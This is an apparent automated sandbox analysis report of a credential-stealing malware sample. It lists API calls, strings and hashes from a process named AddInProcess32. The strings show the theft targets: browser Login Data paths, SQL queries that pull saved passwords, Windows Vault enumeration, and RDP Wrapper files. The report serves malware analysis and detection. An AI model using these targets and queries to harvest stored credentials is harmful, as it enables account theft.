                                                                                      • Instruction Fuzzy Hash: 3EE1E5B19002169FDF05CF99C899B9A7BB4EF49314F188169EC18AF742E734D946CBA0
                                                                                      APIs
                                                                                      • memset.VCRUNTIME140(?,00000000,00000048), ref: 6CC6795C
                                                                                      • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 6CC679FB
                                                                                      • sqlite3_free.NSS3(000000FF), ref: 6CC67A75
                                                                                      • sqlite3_free.NSS3(00000000,000000FF), ref: 6CC67A7D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_free$CreateFilememset
                                                                                      • String ID: psow$winOpen
                                                                                      • API String ID: 952062236-4101858489
                                                                                      • Opcode ID: d7d1f34fde404dc056fc072d239e1c4b49007eeecd7d439a6bf497ab42e194b6
                                                                                      • Instruction ID: b1eecb7e40d2e0ba60672676b1ef6be25a31a5a13fdbc3f9d6ed55d783543011
                                                                                      • Opcode Fuzzy Hash: d7d1f34fde404dc056fc072d239e1c4b49007eeecd7d439a6bf497ab42e194b6
                                                                                      • Instruction Fuzzy Hash: 53819E71E05609AFEB00CF6ACA81BDDB7B4FF08324F244529E914E7B81E7349A549B90
                                                                                      APIs
                                                                                      • PR_SetErrorText.NSS3(00000000,00000000,00000000,00000000,00000000,00000000,?,6CCEE53F,00000000,?), ref: 6CD13DC1
                                                                                      • PORT_SetError_Util.NSS3(FFFFE09A,00000000,?), ref: 6CD13DD7
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • __cftof.LIBCMT(?,?,?,?,?,00000000,?), ref: 6CD13DF1
                                                                                      • SECMOD_ReleaseReadLock.NSS3 ref: 6CD13ED2
                                                                                      • SECMOD_DestroyModule.NSS3(00000000), ref: 6CD13ED8
                                                                                        • Part of subcall function 6CD14161: PR_Lock.NSS3(?,00000000,00000000,?,6CD144A4,00000000,00000000,6CD04E08,?,00000004,?,6CD144F6,81757400,00000004,6CD04CC7,?), ref: 6CD1416C
                                                                                        • Part of subcall function 6CD14161: PR_Unlock.NSS3(?,?,6CD144A4,00000000,00000000,6CD04E08,?,00000004,?,6CD144F6,81757400,00000004,6CD04CC7,?,00000000), ref: 6CD1417E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLock$DestroyError_ModuleReadReleaseTextUnlockUtil__cftof
                                                                                      • String ID:
                                                                                      • API String ID: 2779295898-0
                                                                                      • Opcode ID: ff9d9b02a9fc709f1eace57e8b4776a74d43a39c1e82cde936757ca6fa97647f
                                                                                      • Instruction ID: a5b192fd4f52da267cf5f2bd53548632f520a84d937a7297d96310f6310001eb
                                                                                      • Opcode Fuzzy Hash: ff9d9b02a9fc709f1eace57e8b4776a74d43a39c1e82cde936757ca6fa97647f
                                                                                      • Instruction Fuzzy Hash: 2A31C23260D305EBDB128F68F801B9E77B5EF41328F100229FA1587EA0EB34D955CB64
                                                                                      APIs
                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D44
                                                                                      • CoInitialize.OLE32(00000000), ref: 00410D4B
                                                                                      • CoCreateInstance.OLE32(004174B0,00000000,00000017,00419CC8,?,?,?,?,?,?,?,?,?,00402E47), ref: 00410D69
                                                                                      • VariantInit.OLEAUT32(?), ref: 00410DED
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Initialize$CreateInitInstanceSecurityVariant
                                                                                      • String ID: G.@$Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
                                                                                      • API String ID: 2382742315-1265846757
                                                                                      • Opcode ID: bb29f0628b7f302e476b0615b78b61c4c40fc44bc28a20b96088d3bc31b4ab72
                                                                                      • Instruction ID: 842cc41d95007274ba15a25a83f44bddffeff0cfe444bad9149d26d573bd0b7d
                                                                                      • Opcode Fuzzy Hash: bb29f0628b7f302e476b0615b78b61c4c40fc44bc28a20b96088d3bc31b4ab72
                                                                                      • Instruction Fuzzy Hash: B141FB70A00209BFCB10DB96CC48EDFBBBDEFC9B14B104459F515EB290D6B5A981CB64
                                                                                      APIs
                                                                                      • PR_GetFileMethods.NSS3(?,?,6CCD4218,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0), ref: 6CCC634B
                                                                                        • Part of subcall function 6CCC59F7: PR_GetEnv.NSS3(NSPR_FD_CACHE_SIZE_LOW,?,?,6CCC6357,?,?,6CCD4218,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D), ref: 6CCC59FE
                                                                                        • Part of subcall function 6CCC59F7: PR_GetEnv.NSS3(NSPR_FD_CACHE_SIZE_LOW,?,?,6CCC6357,?,?,6CCD4218,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D), ref: 6CCC5A0C
                                                                                        • Part of subcall function 6CCC59F7: atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?,6CCC6357,?,?,6CCD4218,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D), ref: 6CCC5A28
                                                                                        • Part of subcall function 6CCC59F7: atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?,6CCC6357,?,?,6CCD4218,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D), ref: 6CCC5A3F
                                                                                        • Part of subcall function 6CCC59F7: PR_NewLock.NSS3(?,?,6CCC6357,?,?,6CCD4218,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000), ref: 6CCC5A71
                                                                                      • PR_NewLock.NSS3(?,?,6CCD4218,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0), ref: 6CCC6357
                                                                                        • Part of subcall function 6CCD98DD: PR_Init.NSS3(6CCD9A75,6CCD41E5,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD98E6
                                                                                        • Part of subcall function 6CCD98DD: PR_Calloc.NSS3(00000001,00000084,?,6CCD9A75,6CCD41E5,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD98F3
                                                                                      • PR_NewCondVar.NSS3(00000000,?,?,6CCD4218,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000), ref: 6CCC6362
                                                                                        • Part of subcall function 6CCD96AE: PR_Calloc.NSS3(00000001,00000084,00000000,?,6CCDA827), ref: 6CCD96B9
                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,?,?,6CCD4218,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000), ref: 6CCC6376
                                                                                      • PR_AllocFileDesc.NSS3(00000000,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCC6379
                                                                                      • GetStdHandle.KERNEL32(000000F5,00000000,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCC6388
                                                                                      • PR_AllocFileDesc.NSS3(00000000,?,?,6CCC57D0,?), ref: 6CCC638B
                                                                                        • Part of subcall function 6CCC61FD: PR_SetError.NSS3(FFFFE890,00000000,774D1700,?,6CCC637E,00000000,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCC622C
                                                                                      • GetStdHandle.KERNEL32(000000F4,00000000,?,6CCC57D0,?), ref: 6CCC639A
                                                                                      • PR_AllocFileDesc.NSS3(00000000,?,6CCC57D0,?), ref: 6CCC639D
                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 6CCCECBC
                                                                                        • Part of subcall function 6CCCD438: GetCurrentProcess.KERNEL32(00000008,?), ref: 6CCCD46B
                                                                                        • Part of subcall function 6CCCD438: OpenProcessToken.ADVAPI32(00000000), ref: 6CCCD472
                                                                                        • Part of subcall function 6CCCD438: GetLastError.KERNEL32 ref: 6CCCD48B
                                                                                        • Part of subcall function 6CCCD438: PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6CCCD497
                                                                                        • Part of subcall function 6CCCF5BC: memset.VCRUNTIME140(?,00000000,00000094), ref: 6CCCF5DF
                                                                                        • Part of subcall function 6CCCF5BC: GetVersionExA.KERNEL32(?), ref: 6CCCF5F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AllocDescHandle$CallocErrorLockProcessatoi$CondCurrentInitLastMethodsOpenPrintStartupTokenVersionmemset
                                                                                      • String ID:
                                                                                      • API String ID: 542606992-0
                                                                                      • Opcode ID: f8754ee52ca1e8e261113e57e9f2754d030edff8351cad84acd2dd2ff919bd3a
                                                                                      • Instruction ID: c95c286e33e445582a30a7cd0500ddfab41af5ad53654b04a46a4dc5638093a2
                                                                                      • Opcode Fuzzy Hash: f8754ee52ca1e8e261113e57e9f2754d030edff8351cad84acd2dd2ff919bd3a
                                                                                      • Instruction Fuzzy Hash: 28119471F112546AEF20ABB5CD4ADDA3BBCDB43724B10026AB71897AC0FF755444CB92
                                                                                      APIs
                                                                                        • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,?,?), ref: 00410CBB
                                                                                        • Part of subcall function 00403447: lstrcatW.KERNEL32(00000000,759801C0,?,?,?VA,?,00412AEE,?VA,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,759801C0,00000000), ref: 00403477
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                      • PathFileExistsW.SHLWAPI(00000000,?,00000000,00000000,00000000,.tmp,00000000,004176A4,.tmp,00000000,004176A4,?,00000000), ref: 0040BD0A
                                                                                      • PathFileExistsW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,0040B9AA,\Google\Chrome\User Data\Default\Login Data,\Google\Chrome\User Data\Local State), ref: 0040BD14
                                                                                      • CopyFileW.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,0040B9AA), ref: 0040BD28
                                                                                      • CopyFileW.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,0040B9AA), ref: 0040BD34
                                                                                        • Part of subcall function 0040C63E: LocalFree.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C6A8
                                                                                        • Part of subcall function 0040C63E: LocalFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C6B1
                                                                                        • Part of subcall function 0040C6BD: LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040C745
                                                                                        • Part of subcall function 0040C6BD: BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040C773
                                                                                        • Part of subcall function 0040C6BD: LocalFree.KERNEL32(?), ref: 0040C7FB
                                                                                        • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,759801C0,?,00405B8D,.bss,00000000), ref: 004034DA
                                                                                        • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                                                                        • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                                                                        • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,759801C0,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                                                                        • Part of subcall function 0040319E: lstrlenA.KERNEL32(00000000,004031C6,759801C0,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,759801C0,?,00403620,00000000,?,?), ref: 004031A5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileFreeLocal$Pathlstrlen$CopyExistslstrcat$AllocCryptDecryptFolderSpecialVirtuallstrcpy
                                                                                      • String ID: .tmp$select signon_realm, origin_url, username_value, password_value from logins$select signon_realm, origin_url, username_value, password_value from wow_logins$7Mw
                                                                                      • API String ID: 881303001-259740413
                                                                                      • Opcode ID: 107a37fe8f7f1eff5185771334513dc0eceaef4427f3c283497ed04afd4e201c
                                                                                      • Instruction ID: ba20cf8de6aee4928ce48004bd15a5688bda43775cfbd645d5ca8aed8c6f7f47
                                                                                      • Opcode Fuzzy Hash: 107a37fe8f7f1eff5185771334513dc0eceaef4427f3c283497ed04afd4e201c
                                                                                      • Instruction Fuzzy Hash: 9AD10B71900109ABDB05EFA6DC92AEEBB79EF44309F10413EF512B61E1DF389A45CB58
                                                                                      APIs
                                                                                      • lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\,?,00000104,00000000), ref: 0040B8B9
                                                                                      • lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0040B8C7
                                                                                      • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,00409E8E), ref: 0040B8E0
                                                                                      • RegQueryValueExW.KERNEL32(00409E8E,Path,00000000,?,?,?), ref: 0040B8FD
                                                                                      • RegCloseKey.KERNEL32(00409E8E), ref: 0040B906
                                                                                      Strings
                                                                                      • thunderbird.exe, xrefs: 0040B8BF
                                                                                      • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0040B8B3
                                                                                      • Path, xrefs: 0040B8F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValuelstrcatlstrcpy
                                                                                      • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
                                                                                      • API String ID: 3135247354-1374996286
                                                                                      • Opcode ID: 145a1f37adbbfc8c3e5f119a952875368c6e1147b4b001a2de5ceb485c9eb7eb
                                                                                      • Instruction ID: 3df0df8215fcb83d59d950a1b29e9a277ea2ca522fea2b5b845973b94dc247ed
                                                                                      • Opcode Fuzzy Hash: 145a1f37adbbfc8c3e5f119a952875368c6e1147b4b001a2de5ceb485c9eb7eb
                                                                                      • Instruction Fuzzy Hash: 7D111EB2A4020CBFDB10EBA5DD49FDA7BBCEB54344F1044B6B605E2190E6749F448BA9
                                                                                      APIs
                                                                                      • InitializeCriticalSection.KERNEL32(0055AD18), ref: 0040E5B0
                                                                                        • Part of subcall function 00406099: GetProcessHeap.KERNEL32(00000000,000000F4,00411996,?,759801C0,00000000,00405B72), ref: 0040609C
                                                                                        • Part of subcall function 00406099: HeapAlloc.KERNEL32(00000000), ref: 004060A3
                                                                                        • Part of subcall function 004032E6: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403319
                                                                                        • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000,00000000,?,?,0041348B,00000000,00000000,00000000,.bss,00000000), ref: 0040356E
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
                                                                                      • String ID: %ProgramFiles%$%ProgramW6432%$%windir%\System32$TermService$\Microsoft DN1$\rdpwrap.ini$\rfxvmt.dll$\sqlmap.dll
                                                                                      • API String ID: 2811233055-3289620323
                                                                                      • Opcode ID: a589080e298961b0c1a29d41be42d4b94af7badabb3d8be7f65cdfba163562de
                                                                                      • Instruction ID: 6cb6bcb1a7122bfa5540acbacd22e5e8e3ff012f813de54f9fa316898c3517f8
                                                                                      • Opcode Fuzzy Hash: a589080e298961b0c1a29d41be42d4b94af7badabb3d8be7f65cdfba163562de
                                                                                      • Instruction Fuzzy Hash: 7F319130B0061467C718BF669C628AE2E79ABD8707710063FB5027B2E2DE7C8E45975E
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(vaultcli.dll,00000000,0040A98E,?,00000000,?,00000000,00000001,00000008,\Microsoft\Edge\User Data\Default\Login Data,\Microsoft\Edge\User Data\Local State,00000000,00000000,00000007,\Epic Privacy Browser\User Data\Default\Login Data,\Epic Privacy Browser\User Data\Local State), ref: 0040ACC6
                                                                                        • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoadlstrcmp
                                                                                      • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                      • API String ID: 2493137890-3967309459
                                                                                      • Opcode ID: d22bb24fdbc9040f3830a1c1b40de1b64ce9a1b3d980385fde68668ba647564f
                                                                                      • Instruction ID: 2a90ba8d4adaf7cda04c615fa43a8d23c2bd42836fdc2a547e2a1ab5da71d687
                                                                                      • Opcode Fuzzy Hash: d22bb24fdbc9040f3830a1c1b40de1b64ce9a1b3d980385fde68668ba647564f
                                                                                      • Instruction Fuzzy Hash: 24114235A017018BD7249B71A801BDBB3E6AF85341F54893F986E97781DF38A882CB09
                                                                                      Strings
                                                                                      • attached databases must use the same text encoding as main database, xrefs: 6CC9FE5E
                                                                                      • SELECT name, rootpage, sql FROM "%w".%s ORDER BY rowid, xrefs: 6CC9FEF4
                                                                                      • sqlite_master, xrefs: 6CC9FD54
                                                                                      • unsupported file format, xrefs: 6CC9FED5
                                                                                      • sqlite_temp_master, xrefs: 6CC9FD3E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: SELECT name, rootpage, sql FROM "%w".%s ORDER BY rowid$attached databases must use the same text encoding as main database$sqlite_master$sqlite_temp_master$unsupported file format
                                                                                      • API String ID: 0-1487570871
                                                                                      • Opcode ID: 139dd122354aca72a26bf2b64aa9290f16b9ae2842759510f4f4251468f36ba2
                                                                                      • Instruction ID: 07c68e5d4cb0b954f71230fd777b351f53b17b1d3728c23eabb19c031a84855d
                                                                                      • Opcode Fuzzy Hash: 139dd122354aca72a26bf2b64aa9290f16b9ae2842759510f4f4251468f36ba2
                                                                                      • Instruction Fuzzy Hash: 5E91EF71A04209AFDB14CFA9C8C1BAEBBF4FF09318F14406AF515A7A52E731E945CB90
                                                                                      APIs
                                                                                      • sqlite3_mutex_enter.NSS3(?), ref: 6CC65F2E
                                                                                      • sqlite3_mutex_leave.NSS3(?), ref: 6CC6607F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                      • String ID:
                                                                                      • API String ID: 1477753154-0
                                                                                      • Opcode ID: 2dc09bd2e222ee0a1ea23762b11178801312634974668db6817217ab25716136
                                                                                      • Instruction ID: f3f3494258fc4b5202ad91a04e1db11896b52af63dd5804ff739afa1c06a9e68
                                                                                      • Opcode Fuzzy Hash: 2dc09bd2e222ee0a1ea23762b11178801312634974668db6817217ab25716136
                                                                                      • Instruction Fuzzy Hash: 85411872504601AFDB109F6ADDC0A9EBBF4EF45324F20452EE49897F41FB31D9868B54
                                                                                      APIs
                                                                                      • PR_NewLock.NSS3(?,?,?,?,6CCD420E,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000), ref: 6CCDA797
                                                                                        • Part of subcall function 6CCD98DD: PR_Init.NSS3(6CCD9A75,6CCD41E5,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD98E6
                                                                                        • Part of subcall function 6CCD98DD: PR_Calloc.NSS3(00000001,00000084,?,6CCD9A75,6CCD41E5,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD98F3
                                                                                      • PR_NewLock.NSS3(?,?,?,?,6CCD420E,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000), ref: 6CCDA7A1
                                                                                      • PR_Calloc.NSS3(00000001,0000002C,?,?,?,?,6CCD420E,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D), ref: 6CCDA7B1
                                                                                        • Part of subcall function 6CCDA189: PR_Calloc.NSS3(00000001,00000144,774CDF20,00000000,?,6CCD9F54,?,6CCC80C2,?,?,?,6CCCFD4C,00000000,00000001,00000000,00000000), ref: 6CCDA1A8
                                                                                        • Part of subcall function 6CCDA189: _PR_MD_NEW_LOCK.NSS3(00000040,774CDF20,00000000,?,6CCD9F54,?,6CCC80C2,?,?,?,6CCCFD4C,00000000,00000001,00000000,00000000), ref: 6CCDA1D6
                                                                                      • TlsSetValue.KERNEL32(00000000), ref: 6CCDA7EB
                                                                                      • PR_NewCondVar.NSS3 ref: 6CCDA822
                                                                                      • PR_Abort.NSS3 ref: 6CCDA82F
                                                                                      • PR_NewLock.NSS3 ref: 6CCDA875
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallocLock$AbortCondInitValue
                                                                                      • String ID:
                                                                                      • API String ID: 2296672258-0
                                                                                      • Opcode ID: b91ed9600250c7a580cdb6a78b8301abb19fe1f8b15bc1931b68d3d4b8ae5edb
                                                                                      • Instruction ID: e464ecd1d6f49999bd29347737dffc7851f0e1f149b8cb3c624a74f56d53cc34
                                                                                      • Opcode Fuzzy Hash: b91ed9600250c7a580cdb6a78b8301abb19fe1f8b15bc1931b68d3d4b8ae5edb
                                                                                      • Instruction Fuzzy Hash: 06313C70A23A04AFEB40DF29D8815957BBCFB47354B12412EE70E87BA8E7355886DB50
                                                                                      APIs
                                                                                      • PR_Lock.NSS3(?,?,?,6CCC6EED,6CD88840,R), ref: 6CCD39EE
                                                                                      • PR_NotifyAllCondVar.NSS3(?,?,?,6CCC6EED,6CD88840,R), ref: 6CCD39FF
                                                                                      • PR_Unlock.NSS3(?,?,?,6CCC6EED,6CD88840,R), ref: 6CCD3A0A
                                                                                        • Part of subcall function 6CCD40F7: PR_GetPageSize.NSS3(6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD410E
                                                                                        • Part of subcall function 6CCD40F7: PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD4118
                                                                                        • Part of subcall function 6CCD40F7: PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD4129
                                                                                        • Part of subcall function 6CCD40F7: PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD413A
                                                                                        • Part of subcall function 6CCD40F7: PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD414B
                                                                                        • Part of subcall function 6CCD40F7: PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD415C
                                                                                        • Part of subcall function 6CCD40F7: PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD416D
